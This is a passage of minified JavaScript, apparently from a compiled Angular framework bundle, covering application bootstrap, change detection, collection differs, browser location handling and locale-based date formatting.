S9{constructor(a,e){this.name=a,this.token=e}}function P9(t,a,e=[]){const i=`Platform: ${a}`,n=new ni(i);return(r=[])=>{let c=GD();if(!c||c.injector.get(R9,!1)){const d=[...e,...r,{provide:n,useValue:!0}];t?t(d):function goe(t){if(ru&&!ru.get(R9,!1))throw new gi(400,!1);ru=t;const a=t.get(N9);(function k9(t){const a=t.get(A9,null);a&&a.forEach(e=>e())})(t)}(function O9(t=[],a){return Ko.create({name:a,providers:[{provide:dt,useValue:"platform"},{provide:qD,useValue:new Set([()=>ru=null])},...t]})}(d,i))}return function yoe(t){const a=GD();if(!a)throw new gi(401,!1);return a}()}}function GD(){var t;return null!==(t=null==ru?void 0:ru.get(N9))&&void 0!==t?t:null}let N9=(()=>{class t{constructor(e){this._injector=e,this._modules=[],this._destroyListeners=[],this._destroyed=!1}bootstrapModuleFactory(e,i){const n=function z9(t,a){let e;return e="noop"===t?new hoe:("zone.js"===t?void 0:t)||new qi(a),e}(null==i?void 0:i.ngZone,function L9(t){return{enableLongStackTrace:!1,shouldCoalesceEventChangeDetection:!(!t||!t.ngZoneEventCoalescing)||!1,shouldCoalesceRunChangeDetection:!(!t||!t.ngZoneRunCoalescing)||!1}}(i)),r=[{provide:qi,useValue:n}];return n.run(()=>{const c=Ko.create({providers:r,parent:this.injector,name:e.moduleType.name}),d=e.create(c),T=d.injector.get(yh,null);if(!T)throw new gi(402,!1);return n.runOutsideAngular(()=>{const k=n.onError.subscribe({next:q=>{T.handleError(q)}});d.onDestroy(()=>{Wv(this._modules,d),k.unsubscribe()})}),function W9(t,a,e){try{const i=e();return qC(i)?i.catch(n=>{throw a.runOutsideAngular(()=>t.handleError(n)),n}):i}catch(i){throw a.runOutsideAngular(()=>t.handleError(i)),i}}(T,n,()=>{const k=d.injector.get(Lv);return k.runInitializers(),k.donePromise.then(()=>(function lk(t){mr(t,"Expected localeId to be defined"),"string"==typeof t&&(ck=t.toLowerCase().replace(/_/g,"-"))}(d.injector.get(dm,l1)||l1),this._moduleDoBootstrap(d),d))})})}bootstrapModule(e,i=[]){const n=F9({},i);return function poe(t,a,e){const i=new TD(e);return Promise.resolve(i)}(0,0,e).then(r=>this.bootstrapModuleFactory(r,n))}_moduleDoBootstrap(e){const i=e.injector.get(Jf);if(e._bootstrapComponents.length>0)e._bootstrapComponents.forEach(n=>i.bootstrap(n));else{if(!e.instance.ngDoBootstrap)throw new gi(403,!1);e.instance.ngDoBootstrap(i)}this._modules.push(e)}onDestroy(e){this._destroyListeners.push(e)}get injector(){return this._injector}destroy(){if(this._destroyed)throw new gi(404,!1);this._modules.slice().forEach(i=>i.destroy()),this._destroyListeners.forEach(i=>i());const e=this._injector.get(qD,null);e&&(e.forEach(i=>i()),e.clear()),this._destroyed=!0}get destroyed(){return this._destroyed}}return t.\u0275fac=function(e){return new(e||t)(At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"platform"}),t})();function F9(t,a){return Array.isArray(a)?a.reduce(F9,t):Object.assign(Object.assign({},t),a)}let Jf=(()=>{class t{constructor(e,i,n){this._zone=e,this._injector=i,this._exceptionHandler=n,this._bootstrapListeners=[],this._views=[],this._runningTick=!1,this._stable=!0,this._destroyed=!1,this._destroyListeners=[],this.componentTypes=[],this.components=[],this._onMicrotaskEmptySubscription=this._zone.onMicrotaskEmpty.subscribe({next:()=>{this._zone.run(()=>{this.tick()})}});const r=new G(d=>{this._stable=this._zone.isStable&&!this._zone.hasPendingMacrotasks&&!this._zone.hasPendingMicrotasks,this._zone.runOutsideAngular(()=>{d.next(this._stable),d.complete()})}),c=new G(d=>{let T;this._zone.runOutsideAngular(()=>{T=this._zone.onStable.subscribe(()=>{qi.assertNotInAngularZone(),FD(()=>{!this._stable&&!this._zone.hasPendingMacrotasks&&!this._zone.hasPendingMicrotasks&&(this._stable=!0,d.next(!0))})})});const k=this._zone.onUnstable.subscribe(()=>{qi.assertInAngularZone(),this._stable&&(this._stable=!1,this._zone.runOutsideAngular(()=>{d.next(!1)}))});return()=>{T.unsubscribe(),k.unsubscribe()}});this.isStable=ra(r,c.pipe(Bd()))}get destroyed(){return this._destroyed}get injector(){return this._injector}bootstrap(e,i){const n=e instanceof Yn;if(!this._injector.get(Lv).done)throw!n&&function zl(t){const a=Un(t)||ur(t)||tn(t);return null!==a&&a.standalone}(e),new gi(405,false);let c;c=n?e:this._injector.get(On).resolveComponentFactory(e),this.componentTypes.push(c.componentType);const d=function _oe(t){return t.isBoundToModule}(c)?void 0:this._injector.get(eg),k=c.create(Ko.NULL,[],i||c.selector,d),q=k.location.nativeElement,Y=k.injector.get(I9,null);return null==Y||Y.registerApplication(q),k.onDestroy(()=>{this.detachView(k.hostView),Wv(this.components,k),null==Y||Y.unregisterApplication(q)}),this._loadComponent(k),k}tick(){if(this._runningTick)throw new gi(101,!1);try{this._runningTick=!0;for(let e of this._views)e.detectChanges()}catch(e){this._zone.runOutsideAngular(()=>this._exceptionHandler.handleError(e))}finally{this._runningTick=!1}}attachView(e){const i=e;this._views.push(i),i.attachToAppRef(this)}detachView(e){const i=e;Wv(this._views,i),i.detachFromAppRef()}_loadComponent(e){this.attachView(e.hostView),this.tick(),this.components.push(e),this._injector.get(T9,[]).concat(this._bootstrapListeners).forEach(n=>n(e))}ngOnDestroy(){if(!this._destroyed)try{this._destroyListeners.forEach(e=>e()),this._views.slice().forEach(e=>e.destroy()),this._onMicrotaskEmptySubscription.unsubscribe()}finally{this._destroyed=!0,this._views=[],this._bootstrapListeners=[],this._destroyListeners=[]}}onDestroy(e){return this._destroyListeners.push(e),()=>Wv(this._destroyListeners,e)}destroy(){if(this._destroyed)throw new gi(406,!1);const e=this._injector;e.destroy&&!e.destroyed&&e.destroy()}get viewCount(){return this._views.length}warnIfDestroyed(){}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(Ht),At(yh))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Wv(t,a){const e=t.indexOf(a);e>-1&&t.splice(e,1)}let B9=!0,Ma=(()=>{class t{}return t.__NG_ELEMENT_ID__=voe,t})();function voe(t){return function Aoe(t,a,e){if(ml(t)&&!e){const i=us(t.index,a);return new VC(i,i)}return 47&t.type?new VC(a[16],a):null}(nr(),bi(),16==(16&t))}class j9{constructor(){}supports(a){return HC(a)}create(a){return new Ioe(a)}}const woe=(t,a)=>a;class Ioe{constructor(a){this.length=0,this._linkedRecords=null,this._unlinkedRecords=null,this._previousItHead=null,this._itHead=null,this._itTail=null,this._additionsHead=null,this._additionsTail=null,this._movesHead=null,this._movesTail=null,this._removalsHead=null,this._removalsTail=null,this._identityChangesHead=null,this._identityChangesTail=null,this._trackByFn=a||woe}forEachItem(a){let e;for(e=this._itHead;null!==e;e=e._next)a(e)}forEachOperation(a){let e=this._itHead,i=this._removalsHead,n=0,r=null;for(;e||i;){const c=!i||e&&e.currentIndex<$9(i,n,r)?e:i,d=$9(c,n,r),T=c.currentIndex;if(c===i)n--,i=i._nextRemoved;else if(e=e._next,null==c.previousIndex)n++;else{r||(r=[]);const k=d-n,q=T-n;if(k!=q){for(let te=0;te<k;te++){const pe=te<r.length?r[te]:r[te]=0,Re=pe+te;q<=Re&&Re<k&&(r[te]=pe+1)}r[c.previousIndex]=q-k}}d!==T&&a(c,d,T)}}forEachPreviousItem(a){let e;for(e=this._previousItHead;null!==e;e=e._nextPrevious)a(e)}forEachAddedItem(a){let e;for(e=this._additionsHead;null!==e;e=e._nextAdded)a(e)}forEachMovedItem(a){let e;for(e=this._movesHead;null!==e;e=e._nextMoved)a(e)}forEachRemovedItem(a){let e;for(e=this._removalsHead;null!==e;e=e._nextRemoved)a(e)}forEachIdentityChange(a){let e;for(e=this._identityChangesHead;null!==e;e=e._nextIdentityChange)a(e)}diff(a){if(null==a&&(a=[]),!HC(a))throw new gi(900,!1);return this.check(a)?this:null}onDestroy(){}check(a){this._reset();let n,r,c,e=this._itHead,i=!1;if(Array.isArray(a)){this.length=a.length;for(let d=0;d<this.length;d++)r=a[d],c=this._trackByFn(d,r),null!==e&&Object.is(e.trackById,c)?(i&&(e=this._verifyReinsertion(e,r,c,d)),Object.is(e.item,r)||this._addIdentityChange(e,r)):(e=this._mismatch(e,r,c,d),i=!0),e=e._next}else n=0,function die(t,a){if(Array.isArray(t))for(let e=0;e<t.length;e++)a(t[e]);else{const e=t[X_()]();let i;for(;!(i=e.next()).done;)a(i.value)}}(a,d=>{c=this._trackByFn(n,d),null!==e&&Object.is(e.trackById,c)?(i&&(e=this._verifyReinsertion(e,d,c,n)),Object.is(e.item,d)||this._addIdentityChange(e,d)):(e=this._mismatch(e,d,c,n),i=!0),e=e._next,n++}),this.length=n;return this._truncate(e),this.collection=a,this.isDirty}get isDirty(){return null!==this._additionsHead||null!==this._movesHead||null!==this._removalsHead||null!==this._identityChangesHead}_reset(){if(this.isDirty){let a;for(a=this._previousItHead=this._itHead;null!==a;a=a._next)a._nextPrevious=a._next;for(a=this._additionsHead;null!==a;a=a._nextAdded)a.previousIndex=a.currentIndex;for(this._additionsHead=this._additionsTail=null,a=this._movesHead;null!==a;a=a._nextMoved)a.previousIndex=a.currentIndex;this._movesHead=this._movesTail=null,this._removalsHead=this._removalsTail=null,this._identityChangesHead=this._identityChangesTail=null}}_mismatch(a,e,i,n){let r;return null===a?r=this._itTail:(r=a._prev,this._remove(a)),null!==(a=null===this._unlinkedRecords?null:this._unlinkedRecords.get(i,null))?(Object.is(a.item,e)||this._addIdentityChange(a,e),this._reinsertAfter(a,r,n)):null!==(a=null===this._linkedRecords?null:this._linkedRecords.get(i,n))?(Object.is(a.item,e)||this._addIdentityChange(a,e),this._moveAfter(a,r,n)):a=this._addAfter(new Roe(e,i),r,n),a}_verifyReinsertion(a,e,i,n){let r=null===this._unlinkedRecords?null:this._unlinkedRecords.get(i,null);return null!==r?a=this._reinsertAfter(r,a._prev,n):a.currentIndex!=n&&(a.currentIndex=n,this._addToMoves(a,n)),a}_truncate(a){for(;null!==a;){const e=a._next;this._addToRemovals(this._unlink(a)),a=e}null!==this._unlinkedRecords&&this._unlinkedRecords.clear(),null!==this._additionsTail&&(this._additionsTail._nextAdded=null),null!==this._movesTail&&(this._movesTail._nextMoved=null),null!==this._itTail&&(this._itTail._next=null),null!==this._removalsTail&&(this._removalsTail._nextRemoved=null),null!==this._identityChangesTail&&(this._identityChangesTail._nextIdentityChange=null)}_reinsertAfter(a,e,i){null!==this._unlinkedRecords&&this._unlinkedRecords.remove(a);const n=a._prevRemoved,r=a._nextRemoved;return null===n?this._removalsHead=r:n._nextRemoved=r,null===r?this._removalsTail=n:r._prevRemoved=n,this._insertAfter(a,e,i),this._addToMoves(a,i),a}_moveAfter(a,e,i){return this._unlink(a),this._insertAfter(a,e,i),this._addToMoves(a,i),a}_addAfter(a,e,i){return this._insertAfter(a,e,i),this._additionsTail=null===this._additionsTail?this._additionsHead=a:this._additionsTail._nextAdded=a,a}_insertAfter(a,e,i){const n=null===e?this._itHead:e._next;return a._next=n,a._prev=e,null===n?this._itTail=a:n._prev=a,null===e?this._itHead=a:e._next=a,null===this._linkedRecords&&(this._linkedRecords=new Q9),this._linkedRecords.put(a),a.currentIndex=i,a}_remove(a){return this._addToRemovals(this._unlink(a))}_unlink(a){null!==this._linkedRecords&&this._linkedRecords.remove(a);const e=a._prev,i=a._next;return null===e?this._itHead=i:e._next=i,null===i?this._itTail=e:i._prev=e,a}_addToMoves(a,e){return a.previousIndex===e||(this._movesTail=null===this._movesTail?this._movesHead=a:this._movesTail._nextMoved=a),a}_addToRemovals(a){return null===this._unlinkedRecords&&(this._unlinkedRecords=new Q9),this._unlinkedRecords.put(a),a.currentIndex=null,a._nextRemoved=null,null===this._removalsTail?(this._removalsTail=this._removalsHead=a,a._prevRemoved=null):(a._prevRemoved=this._removalsTail,this._removalsTail=this._removalsTail._nextRemoved=a),a}_addIdentityChange(a,e){return a.item=e,this._identityChangesTail=null===this._identityChangesTail?this._identityChangesHead=a:this._identityChangesTail._nextIdentityChange=a,a}}class Roe{constructor(a,e){this.item=a,this.trackById=e,this.currentIndex=null,this.previousIndex=null,this._nextPrevious=null,this._prev=null,this._next=null,this._prevDup=null,this._nextDup=null,this._prevRemoved=null,this._nextRemoved=null,this._nextAdded=null,this._nextMoved=null,this._nextIdentityChange=null}}class Soe{constructor(){this._head=null,this._tail=null}add(a){null===this._head?(this._head=this._tail=a,a._nextDup=null,a._prevDup=null):(this._tail._nextDup=a,a._prevDup=this._tail,a._nextDup=null,this._tail=a)}get(a,e){let i;for(i=this._head;null!==i;i=i._nextDup)if((null===e||e<=i.currentIndex)&&Object.is(i.trackById,a))return i;return null}remove(a){const e=a._prevDup,i=a._nextDup;return null===e?this._head=i:e._nextDup=i,null===i?this._tail=e:i._prevDup=e,null===this._head}}class Q9{constructor(){this.map=new Map}put(a){const e=a.trackById;let i=this.map.get(e);i||(i=new Soe,this.map.set(e,i)),i.add(a)}get(a,e){const n=this.map.get(a);return n?n.get(a,e):null}remove(a){const e=a.trackById;return this.map.get(e).remove(a)&&this.map.delete(e),a}get isEmpty(){return 0===this.map.size}clear(){this.map.clear()}}function $9(t,a,e){const i=t.previousIndex;if(null===i)return i;let n=0;return e&&i<e.length&&(n=e[i]),i+a+n}class K9{constructor(){}supports(a){return a instanceof Map||uD(a)}create(){return new koe}}class koe{constructor(){this._records=new Map,this._mapHead=null,this._appendAfter=null,this._previousMapHead=null,this._changesHead=null,this._changesTail=null,this._additionsHead=null,this._additionsTail=null,this._removalsHead=null,this._removalsTail=null}get isDirty(){return null!==this._additionsHead||null!==this._changesHead||null!==this._removalsHead}forEachItem(a){let e;for(e=this._mapHead;null!==e;e=e._next)a(e)}forEachPreviousItem(a){let e;for(e=this._previousMapHead;null!==e;e=e._nextPrevious)a(e)}forEachChangedItem(a){let e;for(e=this._changesHead;null!==e;e=e._nextChanged)a(e)}forEachAddedItem(a){let e;for(e=this._additionsHead;null!==e;e=e._nextAdded)a(e)}forEachRemovedItem(a){let e;for(e=this._removalsHead;null!==e;e=e._nextRemoved)a(e)}diff(a){if(a){if(!(a instanceof Map||uD(a)))throw new gi(900,!1)}else a=new Map;return this.check(a)?this:null}onDestroy(){}check(a){this._reset();let e=this._mapHead;if(this._appendAfter=null,this._forEach(a,(i,n)=>{if(e&&e.key===n)this._maybeAddToChanges(e,i),this._appendAfter=e,e=e._next;else{const r=this._getOrCreateRecordForKey(n,i);e=this._insertBeforeOrAppend(e,r)}}),e){e._prev&&(e._prev._next=null),this._removalsHead=e;for(let i=e;null!==i;i=i._nextRemoved)i===this._mapHead&&(this._mapHead=null),this._records.delete(i.key),i._nextRemoved=i._next,i.previousValue=i.currentValue,i.currentValue=null,i._prev=null,i._next=null}return this._changesTail&&(this._changesTail._nextChanged=null),this._additionsTail&&(this._additionsTail._nextAdded=null),this.isDirty}_insertBeforeOrAppend(a,e){if(a){const i=a._prev;return e._next=a,e._prev=i,a._prev=e,i&&(i._next=e),a===this._mapHead&&(this._mapHead=e),this._appendAfter=a,a}return this._appendAfter?(this._appendAfter._next=e,e._prev=this._appendAfter):this._mapHead=e,this._appendAfter=e,null}_getOrCreateRecordForKey(a,e){if(this._records.has(a)){const n=this._records.get(a);this._maybeAddToChanges(n,e);const r=n._prev,c=n._next;return r&&(r._next=c),c&&(c._prev=r),n._next=null,n._prev=null,n}const i=new Poe(a);return this._records.set(a,i),i.currentValue=e,this._addToAdditions(i),i}_reset(){if(this.isDirty){let a;for(this._previousMapHead=this._mapHead,a=this._previousMapHead;null!==a;a=a._next)a._nextPrevious=a._next;for(a=this._changesHead;null!==a;a=a._nextChanged)a.previousValue=a.currentValue;for(a=this._additionsHead;null!=a;a=a._nextAdded)a.previousValue=a.currentValue;this._changesHead=this._changesTail=null,this._additionsHead=this._additionsTail=null,this._removalsHead=null}}_maybeAddToChanges(a,e){Object.is(e,a.currentValue)||(a.previousValue=a.currentValue,a.currentValue=e,this._addToChanges(a))}_addToAdditions(a){null===this._additionsHead?this._additionsHead=this._additionsTail=a:(this._additionsTail._nextAdded=a,this._additionsTail=a)}_addToChanges(a){null===this._changesHead?this._changesHead=this._changesTail=a:(this._changesTail._nextChanged=a,this._changesTail=a)}_forEach(a,e){a instanceof Map?a.forEach(e):Object.keys(a).forEach(i=>e(a[i],i))}}class Poe{constructor(a){this.key=a,this.previousValue=null,this.currentValue=null,this._nextPrevious=null,this._next=null,this._prev=null,this._nextAdded=null,this._nextRemoved=null,this._nextChanged=null}}function X9(){return new Cd([new j9])}let Cd=(()=>{class t{constructor(e){this.factories=e}static create(e,i){if(null!=i){const n=i.factories.slice();e=e.concat(n)}return new t(e)}static extend(e){return{provide:t,useFactory:i=>t.create(e,i||X9()),deps:[[t,new Fc,new Cc]]}}find(e){const i=this.factories.find(n=>n.supports(e));if(null!=i)return i;throw new gi(901,!1)}}return t.\u0275prov=hi({token:t,providedIn:"root",factory:X9}),t})();function Y9(){return new f1([new K9])}let f1=(()=>{class t{constructor(e){this.factories=e}static create(e,i){if(i){const n=i.factories.slice();e=e.concat(n)}return new t(e)}static extend(e){return{provide:t,useFactory:i=>t.create(e,i||Y9()),deps:[[t,new Fc,new Cc]]}}find(e){const i=this.factories.find(n=>n.supports(e));if(i)return i;throw new gi(901,!1)}}return t.\u0275prov=hi({token:t,providedIn:"root",factory:Y9}),t})();const Loe=P9(null,"core",[]);let zoe=(()=>{class t{constructor(e){}}return t.\u0275fac=function(e){return new(e||t)(At(Jf))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function Eh(t){return"boolean"==typeof t?t:null!=t&&"false"!==t}let Bv=null;function su(){return Bv}const ga=new ni("DocumentToken");let XD=(()=>{class t{historyGo(e){throw new Error("Not implemented")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return function Boe(){return At(J9)}()},providedIn:"platform"}),t})();const Hoe=new ni("Location Initialized");let J9=(()=>{class t extends XD{constructor(e){super(),this._doc=e,this._init()}_init(){this.location=window.location,this._history=window.history}getBaseHrefFromDOM(){return su().getBaseHref(this._doc)}onPopState(e){const i=su().getGlobalEventTarget(this._doc,"window");return i.addEventListener("popstate",e,!1),()=>i.removeEventListener("popstate",e)}onHashChange(e){const i=su().getGlobalEventTarget(this._doc,"window");return i.addEventListener("hashchange",e,!1),()=>i.removeEventListener("hashchange",e)}get href(){return this.location.href}get protocol(){return this.location.protocol}get hostname(){return this.location.hostname}get port(){return this.location.port}get pathname(){return this.location.pathname}get search(){return this.location.search}get hash(){return this.location.hash}set pathname(e){this.location.pathname=e}pushState(e,i,n){Z9()?this._history.pushState(e,i,n):this.location.hash=n}replaceState(e,i,n){Z9()?this._history.replaceState(e,i,n):this.location.hash=n}forward(){this._history.forward()}back(){this._history.back()}historyGo(e=0){this._history.go(e)}getState(){return this._history.state}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(){return function Uoe(){return new J9(At(ga))}()},providedIn:"platform"}),t})();function Z9(){return!!window.history.pushState}function YD(t,a){if(0==t.length)return a;if(0==a.length)return t;let e=0;return t.endsWith("/")&&e++,a.startsWith("/")&&e++,2==e?t+a.substring(1):1==e?t+a:t+"/"+a}function eP(t){const a=t.match(/#|\?|$/),e=a&&a.index||t.length;return t.slice(0,e-("/"===t[e-1]?1:0))+t.slice(e)}function Dh(t){return t&&"?"!==t[0]?"?"+t:t}let ig=(()=>{class t{historyGo(e){throw new Error("Not implemented")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return Po(iP)},providedIn:"root"}),t})();const tP=new ni("appBaseHref");let iP=(()=>{class t extends ig{constructor(e,i){var n,r,c;super(),this._platformLocation=e,this._removeListenerFns=[],this._baseHref=null!==(c=null!==(n=null!=i?i:this._platformLocation.getBaseHrefFromDOM())&&void 0!==n?n:null===(r=Po(ga).location)||void 0===r?void 0:r.origin)&&void 0!==c?c:""}ngOnDestroy(){for(;this._removeListenerFns.length;)this._removeListenerFns.pop()()}onPopState(e){this._removeListenerFns.push(this._platformLocation.onPopState(e),this._platformLocation.onHashChange(e))}getBaseHref(){return this._baseHref}prepareExternalUrl(e){return YD(this._baseHref,e)}path(e=!1){const i=this._platformLocation.pathname+Dh(this._platformLocation.search),n=this._platformLocation.hash;return n&&e?`${i}${n}`:i}pushState(e,i,n,r){const c=this.prepareExternalUrl(n+Dh(r));this._platformLocation.pushState(e,i,c)}replaceState(e,i,n,r){const c=this.prepareExternalUrl(n+Dh(r));this._platformLocation.replaceState(e,i,c)}forward(){this._platformLocation.forward()}back(){this._platformLocation.back()}getState(){return this._platformLocation.getState()}historyGo(e=0){var i,n;null===(n=(i=this._platformLocation).historyGo)||void 0===n||n.call(i,e)}}return t.\u0275fac=function(e){return new(e||t)(At(XD),At(tP,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),qoe=(()=>{class t extends ig{constructor(e,i){super(),this._platformLocation=e,this._baseHref="",this._removeListenerFns=[],null!=i&&(this._baseHref=i)}ngOnDestroy(){for(;this._removeListenerFns.length;)this._removeListenerFns.pop()()}onPopState(e){this._removeListenerFns.push(this._platformLocation.onPopState(e),this._platformLocation.onHashChange(e))}getBaseHref(){return this._baseHref}path(e=!1){let i=this._platformLocation.hash;return null==i&&(i="#"),i.length>0?i.substring(1):i}prepareExternalUrl(e){const i=YD(this._baseHref,e);return i.length>0?"#"+i:i}pushState(e,i,n,r){let c=this.prepareExternalUrl(n+Dh(r));0==c.length&&(c=this._platformLocation.pathname),this._platformLocation.pushState(e,i,c)}replaceState(e,i,n,r){let c=this.prepareExternalUrl(n+Dh(r));0==c.length&&(c=this._platformLocation.pathname),this._platformLocation.replaceState(e,i,c)}forward(){this._platformLocation.forward()}back(){this._platformLocation.back()}getState(){return this._platformLocation.getState()}historyGo(e=0){var i,n;null===(n=(i=this._platformLocation).historyGo)||void 0===n||n.call(i,e)}}return t.\u0275fac=function(e){return new(e||t)(At(XD),At(tP,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),iy=(()=>{class t{constructor(e){this._subject=new Tt,this._urlChangeListeners=[],this._urlChangeSubscription=null,this._locationStrategy=e;const i=this._locationStrategy.getBaseHref();this._baseHref=eP(aP(i)),this._locationStrategy.onPopState(n=>{this._subject.emit({url:this.path(!0),pop:!0,state:n.state,type:n.type})})}ngOnDestroy(){var e;null===(e=this._urlChangeSubscription)||void 0===e||e.unsubscribe(),this._urlChangeListeners=[]}path(e=!1){return this.normalize(this._locationStrategy.path(e))}getState(){return this._locationStrategy.getState()}isCurrentPathEqualTo(e,i=""){return this.path()==this.normalize(e+Dh(i))}normalize(e){return t.stripTrailingSlash(function joe(t,a){return t&&a.startsWith(t)?a.substring(t.length):a}(this._baseHref,aP(e)))}prepareExternalUrl(e){return e&&"/"!==e[0]&&(e="/"+e),this._locationStrategy.prepareExternalUrl(e)}go(e,i="",n=null){this._locationStrategy.pushState(n,"",e,i),this._notifyUrlChangeListeners(this.prepareExternalUrl(e+Dh(i)),n)}replaceState(e,i="",n=null){this._locationStrategy.replaceState(n,"",e,i),this._notifyUrlChangeListeners(this.prepareExternalUrl(e+Dh(i)),n)}forward(){this._locationStrategy.forward()}back(){this._locationStrategy.back()}historyGo(e=0){var i,n;null===(n=(i=this._locationStrategy).historyGo)||void 0===n||n.call(i,e)}onUrlChange(e){return this._urlChangeListeners.push(e),this._urlChangeSubscription||(this._urlChangeSubscription=this.subscribe(i=>{this._notifyUrlChangeListeners(i.url,i.state)})),()=>{var i;const n=this._urlChangeListeners.indexOf(e);this._urlChangeListeners.splice(n,1),0===this._urlChangeListeners.length&&(null===(i=this._urlChangeSubscription)||void 0===i||i.unsubscribe(),this._urlChangeSubscription=null)}}_notifyUrlChangeListeners(e="",i){this._urlChangeListeners.forEach(n=>n(e,i))}subscribe(e,i,n){return this._subject.subscribe({next:e,error:i,complete:n})}}return t.normalizeQueryParams=Dh,t.joinWithSlash=YD,t.stripTrailingSlash=eP,t.\u0275fac=function(e){return new(e||t)(At(ig))},t.\u0275prov=hi({token:t,factory:function(){return function Goe(){return new iy(At(ig))}()},providedIn:"root"}),t})();function aP(t){return t.replace(/\/index.html$/,"")}var Tl=(()=>((Tl=Tl||{})[Tl.Decimal=0]="Decimal",Tl[Tl.Percent=1]="Percent",Tl[Tl.Currency=2]="Currency",Tl[Tl.Scientific=3]="Scientific",Tl))(),Jr=(()=>((Jr=Jr||{})[Jr.Format=0]="Format",Jr[Jr.Standalone=1]="Standalone",Jr))(),Zn=(()=>((Zn=Zn||{})[Zn.Narrow=0]="Narrow",Zn[Zn.Abbreviated=1]="Abbreviated",Zn[Zn.Wide=2]="Wide",Zn[Zn.Short=3]="Short",Zn))(),Pr=(()=>((Pr=Pr||{})[Pr.Short=0]="Short",Pr[Pr.Medium=1]="Medium",Pr[Pr.Long=2]="Long",Pr[Pr.Full=3]="Full",Pr))(),Ba=(()=>((Ba=Ba||{})[Ba.Decimal=0]="Decimal",Ba[Ba.Group=1]="Group",Ba[Ba.List=2]="List",Ba[Ba.PercentSign=3]="PercentSign",Ba[Ba.PlusSign=4]="PlusSign",Ba[Ba.MinusSign=5]="MinusSign",Ba[Ba.Exponential=6]="Exponential",Ba[Ba.SuperscriptingExponent=7]="SuperscriptingExponent",Ba[Ba.PerMille=8]="PerMille",Ba[Ba.Infinity=9]="Infinity",Ba[Ba.NaN=10]="NaN",Ba[Ba.TimeSeparator=11]="TimeSeparator",Ba[Ba.CurrencyDecimal=12]="CurrencyDecimal",Ba[Ba.CurrencyGroup=13]="CurrencyGroup",Ba))();function Hv(t,a){return bd(Kc(t)[Ji.DateFormat],a)}function Uv(t,a){return bd(Kc(t)[Ji.TimeFormat],a)}function qv(t,a){return bd(Kc(t)[Ji.DateTimeFormat],a)}function yd(t,a){const e=Kc(t),i=e[Ji.NumberSymbols][a];if(void 0===i){if(a===Ba.CurrencyDecimal)return e[Ji.NumberSymbols][Ba.Decimal];if(a===Ba.CurrencyGroup)return e[Ji.NumberSymbols][Ba.Group]}return i}function oP(t){if(!t[Ji.ExtraData])throw new Error(`Missing extra locale data for the locale "${t[Ji.LocaleId]}". Use "registerLocaleData" to load new data. See the "I18n guide" on angular.io to know more.`)}function bd(t,a){for(let e=a;e>-1;e--)if(void 0!==t[e])return t[e];throw new Error("Locale data API: locale data undefined")}function ZD(t){const[a,e]=t.split(":");return{hours:+a,minutes:+e}}const ore=/^(\d{4,})-?(\d\d)-?(\d\d)(?:T(\d\d)(?::?(\d\d)(?::?(\d\d)(?:\.(\d+))?)?)?(Z|([+-])(\d\d):?(\d\d))?)?$/,ay={},rre=/((?:[^BEGHLMOSWYZabcdhmswyz']+)|(?:'(?:[^']|'')*')|(?:G{1,5}|y{1,4}|Y{1,4}|M{1,5}|L{1,5}|w{1,2}|W{1}|d{1,2}|E{1,6}|c{1,6}|a{1,5}|b{1,5}|B{1,5}|h{1,2}|H{1,2}|m{1,2}|s{1,2}|S{1,3}|z{1,4}|Z{1,5}|O{1,4}))([\s\S]*)/;var Ns=(()=>((Ns=Ns||{})[Ns.Short=0]="Short",Ns[Ns.ShortGMT=1]="ShortGMT",Ns[Ns.Long=2]="Long",Ns[Ns.Extended=3]="Extended",Ns))(),Ga=(()=>((Ga=Ga||{})[Ga.FullYear=0]="FullYear",Ga[Ga.Month=1]="Month",Ga[Ga.Date=2]="Date",Ga[Ga.Hours=3]="Hours",Ga[Ga.Minutes=4]="Minutes",Ga[Ga.Seconds=5]="Seconds",Ga[Ga.FractionalSeconds=6]="FractionalSeconds",Ga[Ga.Day=7]="Day",Ga))(),Tn=(()=>((Tn=Tn||{})[Tn.DayPeriods=0]="DayPeriods",Tn[Tn.Days=1]="Days",Tn[Tn.Months=2]="Months",Tn[Tn.Eras=3]="Eras",Tn))();function e6(t,a,e,i){let n=function pre(t){if(cP(t))return t;if("number"==typeof t&&!isNaN(t))return new Date(t);if("string"==typeof t){if(t=t.trim(),/^(\d{4}(-\d{1,2}(-\d{1,2})?)?)$/.test(t)){const[n,r=1,c=1]=t.split("-").map(d=>+d);return Gv(n,r-1,c)}const e=parseFloat(t);if(!isNaN(t-e))return new Date(e);let i;if(i=t.match(ore))return function _re(t){const a=new Date(0);let e=0,i=0;const n=t[8]?a.setUTCFullYear:a.setFullYear,r=t[8]?a.setUTCHours:a.setHours;t[9]&&(e=Number(t[9]+t[10]),i=Number(t[9]+t[11])),n.call(a,Number(t[1]),Number(t[2])-1,Number(t[3]));const c=Number(t[4]||0)-e,d=Number(t[5]||0)-i,T=Number(t[6]||0),k=Math.floor(1e3*parseFloat("0."+(t[7]||0)));return r.call(a,c,d,T,k),a}(i)}const a=new Date(t);if(!cP(a))throw new Error(`Unable to convert "${t}" into a date`);return a}(t);a=xh(e,a)||a;let d,c=[];for(;a;){if(d=rre.exec(a),!d){c.push(a);break}{c=c.concat(d.slice(1));const q=c.pop();if(!q)break;a=q}}let T=n.getTimezoneOffset();i&&(T=sP(i,T),n=function fre(t,a,e){const i=e?-1:1,n=t.getTimezoneOffset();return function hre(t,a){return(t=new Date(t.getTime())).setMinutes(t.getMinutes()+a),t}(t,i*(sP(a,n)-n))}(n,i,!0));let k="";return c.forEach(q=>{const Y=function ure(t){if(a6[t])return a6[t];let 